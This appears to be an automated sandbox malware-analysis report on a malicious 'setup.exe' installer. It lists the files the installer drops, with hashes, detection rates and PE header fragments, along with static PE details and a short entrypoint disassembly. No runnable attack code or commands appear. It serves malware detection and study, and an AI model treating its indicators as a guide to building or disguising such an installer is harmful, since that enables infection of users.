                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exe

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                            Size (bytes):8767044
                                                                                                                                                                                                                            Entropy (8bit):7.960152326344281
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:196608:r7B6e1u5SqD6mOefSP01pbtDgGFN6sskirwDODi:roweOFCS8jbtM8N6sjYY
                                                                                                                                                                                                                            MD5:51F99EDDD33CC04FB0F55F873B76D907
                                                                                                                                                                                                                            SHA1:60CD79359912A9069674CEE3C5C5982A9B01CE82
                                                                                                                                                                                                                            SHA-256:16E037D7B5F6A8E02B73671E1214B7979EB5D0AB0FC1106CF4C321F0FF53E13A
                                                                                                                                                                                                                            SHA-512:7D2DF781963C8AC8A6F2A86EB95742AA26C932671D31DF8F09E334B2AF5E543EC3FB636ABFA4FB2512EC70126E1B9DB6DC7E9446A2A85BCA53EAFC790668964A
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 39%
                                                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                                                            • Filename: Set-up.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: #Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: installer_1.05_36.5.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: @Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: MdhO83N5Fm.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f.................t...p....................@.......................................@......@...................p..q....P.......................~..XG...........................................................R..\....`.......................text....V.......X.................. ..`.itext..d....p.......\.............. ..`.data...88.......:...x..............@....bss....Xr...............................idata.......P......................@....didata......`......................@....edata..q....p......................@..@.tls.....................................rdata..]...........................@..@.reloc..............................@..B.rsrc...............................@..@....................................@..@................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2odurdwb.dry.psm1

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ipkza234.s34.ps1

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mhsxg22j.fa5.psm1

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mldtj22x.2en.ps1

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):3367424
                                                                                                                                                                                                                            Entropy (8bit):6.530011244733973
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:98304:qJYVM+LtVt3P/KuG2ONG9iqLRQEd333T:7VL/tnHGYiql5l
                                                                                                                                                                                                                            MD5:F809F51E678B7F2E388F8C969EF902C8
                                                                                                                                                                                                                            SHA1:DC1C645533E0FD1637BF455BA69A9481E7C4B83A
                                                                                                                                                                                                                            SHA-256:8D6E5513DE230109BE2238537173352832D1AEBDC7B10FAD0E59D4882812CA81
                                                                                                                                                                                                                            SHA-512:C500B40B604AD6203396FCC0243CBB50EAD544586EAB2448C2C6BCC2106DFAE3777A85C344766224F5F695FA60295880623B2A97B0AAE97DC547076FA03CD067
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                                                            • Filename: Set-up.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: #Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: installer_1.05_36.5.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: @Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: MdhO83N5Fm.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04.......3...@......@...................P,.n.....,.j:...P0.p.....................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc...p....P0......./.............@..@.............04......`3.............@..@................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):3367424
                                                                                                                                                                                                                            Entropy (8bit):6.530011244733973
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:98304:qJYVM+LtVt3P/KuG2ONG9iqLRQEd333T:7VL/tnHGYiql5l
                                                                                                                                                                                                                            MD5:F809F51E678B7F2E388F8C969EF902C8
                                                                                                                                                                                                                            SHA1:DC1C645533E0FD1637BF455BA69A9481E7C4B83A
                                                                                                                                                                                                                            SHA-256:8D6E5513DE230109BE2238537173352832D1AEBDC7B10FAD0E59D4882812CA81
                                                                                                                                                                                                                            SHA-512:C500B40B604AD6203396FCC0243CBB50EAD544586EAB2448C2C6BCC2106DFAE3777A85C344766224F5F695FA60295880623B2A97B0AAE97DC547076FA03CD067
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04.......3...@......@...................P,.n.....,.j:...P0.p.....................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc...p....P0......./.............@..@.............04......`3.............@..@................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\is-EUFB2.tmp\_isetup\_isdecmp.dll

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):35616
                                                                                                                                                                                                                            Entropy (8bit):6.953519176025623
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:768:Z4NHPfHCs6GNOpiM+RFjFyzcN23A4F+OiR9riuujF+X4UriXiRF:Zanvc+R9F4s8/RiPWuUs4UWXiv
                                                                                                                                                                                                                            MD5:C6AE924AD02500284F7E4EFA11FA7CFC
                                                                                                                                                                                                                            SHA1:2A7770B473B0A7DC9A331D017297FF5AF400FED8
                                                                                                                                                                                                                            SHA-256:31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
                                                                                                                                                                                                                            SHA-512:F321E4820B39D1642FC43BF1055471A323EDCC0C4CBD3DDD5AD26A7B28C4FB9FC4E57C00AE7819A4F45A3E0BB9C7BAA0BA19C3CEEDACF38B911CDF625AA7DDAE
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#~..#~..#~...q.. ~..#~..!~......"~......+~......"~......"~..Rich#~..........................PE..L....[.L...........!.....6...........E.......P......................................D=...............................P.......P..(....................L.. ?...p.......................................................P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...8....`.......<..............@....reloc.......p.......J..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\is-EUFB2.tmp\_isetup\_setup64.tmp

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp
                                                                                                                                                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):6144
                                                                                                                                                                                                                            Entropy (8bit):4.720366600008286
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                                                                                                                            MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                                                                                                                            SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                                                                                                                            SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                                                                                                                            SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\is-MO41V.tmp\_isetup\_isdecmp.dll

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):35616
                                                                                                                                                                                                                            Entropy (8bit):6.953519176025623
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:768:Z4NHPfHCs6GNOpiM+RFjFyzcN23A4F+OiR9riuujF+X4UriXiRF:Zanvc+R9F4s8/RiPWuUs4UWXiv
                                                                                                                                                                                                                            MD5:C6AE924AD02500284F7E4EFA11FA7CFC
                                                                                                                                                                                                                            SHA1:2A7770B473B0A7DC9A331D017297FF5AF400FED8
                                                                                                                                                                                                                            SHA-256:31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
                                                                                                                                                                                                                            SHA-512:F321E4820B39D1642FC43BF1055471A323EDCC0C4CBD3DDD5AD26A7B28C4FB9FC4E57C00AE7819A4F45A3E0BB9C7BAA0BA19C3CEEDACF38B911CDF625AA7DDAE
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#~..#~..#~...q.. ~..#~..!~......"~......+~......"~......"~..Rich#~..........................PE..L....[.L...........!.....6...........E.......P......................................D=...............................P.......P..(....................L.. ?...p.......................................................P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...8....`.......<..............@....reloc.......p.......J..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\is-MO41V.tmp\_isetup\_setup64.tmp

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp
                                                                                                                                                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):6144
                                                                                                                                                                                                                            Entropy (8bit):4.720366600008286
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                                                                                                                            MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                                                                                                                            SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                                                                                                                            SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                                                                                                                            SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe (copy)

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):846325235
                                                                                                                                                                                                                            Entropy (8bit):0.13954043794048707
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                            MD5:6A8860A8150021B2D5B9BB707DE4FA37
                                                                                                                                                                                                                            SHA1:FEB8A10FEE0388E1D93C669444F3A237C38EA5E4
                                                                                                                                                                                                                            SHA-256:0CE2CDB61164F5C03D11DEF609873901F58510F764E8491B4EC1A5D3E0759E0B
                                                                                                                                                                                                                            SHA-512:899CC13F5CD136D9F3D06BD13BD608CAB1DCEC1CE2F550A371C76253CFB155149A2CAE9827A365CCCFFA921A607A684DC7CD1A15645D317D7D9C199CEA1735F8
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........"w.RC..RC..RC..I..`C..I...C..[;..UC..[;..IC..RC...B..I..NC..I..{C..I..SC..I..SC..RichRC..........................PE..L....NKO......................h...................@..........................@r.......r.......@.........................................:.e..........................................................................................................text...!........................... ..`.rdata...1.......2..................@..@.data...x........,..................@....rsrc...:.e.......e.................@..@........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\ColorStreamLib\is-T64JA.tmp

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):846325235
                                                                                                                                                                                                                            Entropy (8bit):0.13954043794048707
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                            MD5:6A8860A8150021B2D5B9BB707DE4FA37
                                                                                                                                                                                                                            SHA1:FEB8A10FEE0388E1D93C669444F3A237C38EA5E4
                                                                                                                                                                                                                            SHA-256:0CE2CDB61164F5C03D11DEF609873901F58510F764E8491B4EC1A5D3E0759E0B
                                                                                                                                                                                                                            SHA-512:899CC13F5CD136D9F3D06BD13BD608CAB1DCEC1CE2F550A371C76253CFB155149A2CAE9827A365CCCFFA921A607A684DC7CD1A15645D317D7D9C199CEA1735F8
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........"w.RC..RC..RC..I..`C..I...C..[;..UC..[;..IC..RC...B..I..NC..I..{C..I..SC..I..SC..RichRC..........................PE..L....NKO......................h...................@..........................@r.......r.......@.........................................:.e..........................................................................................................text...!........................... ..`.rdata...1.......2..................@..@.data...x........,..................@....rsrc...:.e.......e.................@..@........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            Static File Info

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Entropy (8bit):7.100988274870544
                                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.79%
                                                                                                                                                                                                                            • Win32 Executable Delphi generic (14689/80) 0.15%
                                                                                                                                                                                                                            • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                            File name:setup.exe
                                                                                                                                                                                                                            File size:2'097'152 bytes
                                                                                                                                                                                                                            MD5:d781fd542a1dcb91c07c192bcac16f8e
                                                                                                                                                                                                                            SHA1:86ba60cac73d2f28120d452783622e7844e427f0
                                                                                                                                                                                                                            SHA256:7d28c7b252fb0b95ea0b5f305e5bb4e781773a9a8582a7cf1076650677263ef0
                                                                                                                                                                                                                            SHA512:0ddbbd3adee993b4cd0a9504febc7b64b72213dc49ffe70b80014a99ba317c0b16c78c2815333ccb1f5c218da27748869fb989fbed4bae4a5a23bce8dc847d5b
                                                                                                                                                                                                                            SSDEEP:49152:kuGsknvHDK8YcrWaCyqp1uw/0L5HiwSX1W//Jg:/GsknvHe8Yzacp50LpSX1W//Jg
                                                                                                                                                                                                                            TLSH:37A59DA2FB4388B3F227263D1D4AD794552E7F115FF0648B3BF84A4C0BB561139252AB
                                                                                                                                                                                                                            File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                                                                                                                                            File Icon

                                                                                                                                                                                                                            Icon Hash:3e5fcdce1f0c2813

                                                                                                                                                                                                                            Static PE Info

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Entrypoint:0x52859c
                                                                                                                                                                                                                            Entrypoint Section:CODE
                                                                                                                                                                                                                            Digitally signed:true
                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                                                                                                                            DLL Characteristics:
                                                                                                                                                                                                                            Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                                            OS Version Major:4
                                                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                                                            File Version Major:4
                                                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                                                            Subsystem Version Major:4
                                                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                                                            Import Hash:ba8c1dbdc3c38ecddecbc436d980538f

                                                                                                                                                                                                                            Authenticode Signature

                                                                                                                                                                                                                            Signature Valid:
                                                                                                                                                                                                                            Signature Issuer:
                                                                                                                                                                                                                            Signature Validation Error:
                                                                                                                                                                                                                            Error Number:
                                                                                                                                                                                                                            Not Before, Not After
                                                                                                                                                                                                                              Subject Chain
                                                                                                                                                                                                                                Version:
                                                                                                                                                                                                                                Thumbprint MD5:
                                                                                                                                                                                                                                Thumbprint SHA-1:
                                                                                                                                                                                                                                Thumbprint SHA-256:
                                                                                                                                                                                                                                Serial:

                                                                                                                                                                                                                                Entrypoint Preview

                                                                                                                                                                                                                                Instruction
                                                                                                                                                                                                                                push ebp
                                                                                                                                                                                                                                mov ebp, esp
                                                                                                                                                                                                                                add esp, FFFFFFF0h
                                                                                                                                                                                                                                mov eax, 00528184h
                                                                                                                                                                                                                                call 00007F1EA46DE041h
                                                                                                                                                                                                                                mov eax, dword ptr [0052C484h]
                                                                                                                                                                                                                                mov eax, dword ptr [eax]
                                                                                                                                                                                                                                call 00007F1EA474444Dh
                                                                                                                                                                                                                                mov ecx, dword ptr [0052C1D8h]
                                                                                                                                                                                                                                mov eax, dword ptr [0052C484h]
                                                                                                                                                                                                                                mov eax, dword ptr [eax]
                                                                                                                                                                                                                                mov edx, dword ptr [005263B0h]
                                                                                                                                                                                                                                call 00007F1EA474444Dh
                                                                                                                                                                                                                                mov ecx, dword ptr [0052C15Ch]
                                                                                                                                                                                                                                mov eax, dword ptr [0052C484h]
                                                                                                                                                                                                                                mov eax, dword ptr [eax]
                                                                                                                                                                                                                                mov edx, dword ptr [00525E40h]
                                                                                                                                                                                                                                call 00007F1EA4744435h
                                                                                                                                                                                                                                mov eax, dword ptr [0052C484h]
                                                                                                                                                                                                                                mov eax, dword ptr [eax]
                                                                                                                                                                                                                                call 00007F1EA47444A9h
                                                                                                                                                                                                                                call 00007F1EA46DB8D8h
                                                                                                                                                                                                                                lea eax, dword ptr [eax+00h]
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
